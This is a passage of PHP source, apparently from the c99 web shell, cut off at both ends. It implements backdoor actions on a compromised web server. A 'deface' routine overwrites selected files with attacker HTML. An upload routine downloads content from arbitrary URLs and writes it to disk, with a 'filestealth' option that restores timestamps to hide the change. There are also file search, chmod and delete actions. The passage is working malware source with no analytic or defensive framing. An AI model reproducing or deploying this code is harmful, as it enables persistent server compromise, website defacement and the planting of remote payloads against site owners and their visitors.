1129&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1130<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
1131<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
1132<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
1133 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
1134}
1135if ($act == "search")
1136{
1137 if (empty($search_in)) {$search_in = $d;}
1138 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1139 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1140
1141 if (!empty($submit))
1142 {
1143  $found = array();
1144  $found_d = 0;
1145  $found_f = 0;
1146  $a = array
1147  (
1148   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1149   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1150   "text_wwo"=>$search_text_wwo,
1151   "text_cs"=>$search_text_cs,
1152   "text_not"=>$search_text_not
1153  );
1154  $searchtime = getmicrotime();
1155  $in = array_unique(explode(";",$search_in));
1156  foreach($in as $v)
1157  {
1158   c99fsearch($v);
1159  }
1160  $searchtime = round(getmicrotime()-$searchtime,4);
1161  if (count($found) == 0) {echo "<b>No files found!</b>";}
1162  else
1163  {
1164   $ls_arr = $found;
1165   $disp_fullpath = true;
1166   $act = $dspact = "ls";
1167  }
1168 }
1169 echo "<form method=\"POST\">
1170<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1171<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
1172<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1173<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1174<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
1175&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
1176&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
1177&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1178<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
1179 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
1180}
1181if ($act == "chmod")
1182{
1183 $perms = fileperms($d.$f);
1184 if (!$perms) {echo "Can't get current mode.";}
1185 elseif ($submit)
1186 {
1187  if (!isset($owner[0])) {$owner[0] = 0;}
1188  if (!isset($owner[1])) {$owner[1] = 0; }
1189  if (!isset($owner[2])) {$owner[2] = 0;}
1190  if (!isset($group[0])) {$group[0] = 0;}
1191  if (!isset($group[1])) {$group[1] = 0;}
1192  if (!isset($group[2])) {$group[2] = 0;}
1193  if (!isset($world[0])) {$world[0] = 0;}
1194  if (!isset($world[1])) {$world[1] = 0;}
1195  if (!isset($world[2])) {$world[2] = 0;}
1196  $sum_owner = $owner[0] + $owner[1] + $owner[2];
1197  $sum_group = $group[0] + $group[1] + $group[2];
1198  $sum_world = $world[0] + $world[1] + $world[2];
1199  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
1200  $ret = @chmod($d.$f, $sum_chmod);
1201  if ($ret) {$act = "ls";}
1202  else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
1203 }
1204 else
1205 {
1206  echo "<b>Changing file-mode</b><br>";
1207  $perms = view_perms(fileperms($d.$f));
1208  $length = strlen($perms);
1209  $owner_r = $owner_w = $owner_x =
1210  $group_r = $group_w = $group_x = 
1211  $world_r = $world_w = $group_x = "";
1212
1213  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
1214  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
1215  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
1216  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
1217												 if ($perms[9] == "x") {$world_x = " checked";}
1218  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
1219<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
1220<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
1221<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
1222<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
1223<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
1224<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
1225<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
1226<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
1227<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
1228<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
1229<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
1230</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
1231 }
1232}
1233if ($act == "upload")
1234{
1235 $uploadmess = "";
1236 $uploadpath = str_replace("\\","/",$uploadpath);
1237 if (empty($uploadpath)) {$uploadpath = $d;}
1238 elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
1239 if (!empty($submit))
1240 {
1241  global $HTTP_POST_FILES;
1242  $uploadfile = $HTTP_POST_FILES["uploadfile"];
1243  if (!empty($uploadfile[tmp_name]))
1244  {
1245   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
1246   else {$destin = $userfilename;}
1247   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
1248  }
1249  elseif (!empty($uploadurl))
1250  {
1251   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1252   else
1253   {
1254    $destin = explode("/",$destin);
1255    $destin = $destin[count($destin)-1];
1256    if (empty($destin))
1257    {
1258     $i = 0;
1259     $b = "";
1260     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1261   }
1262   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1263   else
1264   {
1265    $st = getmicrotime();
1266    $content = @file_get_contents($uploadurl);
1267    $dt = round(getmicrotime()-$st,4);
1268    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
1269    else
1270    {
1271     if ($filestealth) {$stat = stat($uploadpath.$destin);}
1272     $fp = fopen($uploadpath.$destin,"w");
1273     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1274     else
1275     {
1276      fwrite($fp,$content,strlen($content));
1277      fclose($fp);
1278      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1279     }
1280    }
1281   }
1282  }
1283 }
1284 if ($miniform)
1285 {
1286  echo "<b>".$uploadmess."</b>";
1287  $act = "ls";
1288 }
1289 else
1290 {
1291  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
1292Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
1293Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1294Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1295File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1296<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
1297<input type=\"submit\" name=\"submit\" value=\"Upload\">
1298</form>";
1299 }
1300}
1301if ($act == "delete")
1302{
1303 $delerr = "";
1304 foreach ($actbox as $v)
1305 {
1306  $result = false;
1307  $result = fs_rmobj($v);
1308  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1309  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1310 }
1311 $act = "ls";
1312}
1313if ($act == "deface")
1314{
1315 $deferr = "";
1316 foreach ($actbox as $v)
1317 {
1318  $data = $deface_html;
1319  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
1320  $data = str_replace("%%%filename%%%",basename($v),$data);
1321  $data = str_replace("%%%filepath%%%",$v,$data);
1322  $fp = @fopen($v,"w");
1323  fwrite($fp,$data);
1324  fclose($fp);
1325  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
1326  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
1327 }
1328}
1329if (!$usefsbuff)
1330{
1331 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
1332}
1333else
1334{
1335 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1336 if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1337 if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
1338 
1339 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
1340 el